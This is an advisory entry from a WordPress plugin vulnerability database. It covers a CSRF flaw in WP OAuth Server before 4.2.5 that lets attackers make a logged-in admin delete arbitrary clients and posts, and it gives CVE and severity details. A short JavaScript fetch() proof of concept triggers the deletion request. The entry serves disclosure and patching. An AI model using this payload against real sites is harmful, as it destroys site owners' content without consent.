WordPress Plugin Vulnerabilities

WP OAuth Server < 4.2.5 - Arbitrary Post Deletion via CSRF

Description

The plugin does not have CSRF check when deleting a client, and does not ensure that the object to be deleted is actually a client, which could allow attackers to make a logged in admin delete arbitrary client and post via a CSRF attack.

Proof of Concept

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wo_remove_client&data=1',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

Plugin icon
oauth2-provider
Fixed in 4.2.5

References

CVE
CVE-2022-3894

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
6.5 (medium)

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified
Yes
WPVDB ID
298487b2-4141-4c9f-9bb2-e1450aefc1a8

Timeline

Publicly Published
2023-02-21 (about 1 years ago)
Added
2023-02-21 (about 1 years ago)
Last Updated
2023-02-21 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
Google Analytics MU 2.3 - google-analytics-mu-network.php Analytics Code Manipulation CSRF
Published
2024-04-11
Title
Modal Window < 5.3.10 - Modal Deletion via CSRF
Published
2014-08-01
Title
Better Search < 1.3 - admin.inc.php Setting Manipulation CSRF
Published
2020-09-16
Title
Easy Testimonials < 3.7 - Cross-Site Request Forgery
Published
2021-02-22
Title
WP Content Plus < 3.2 - CSRF Nonce Bypass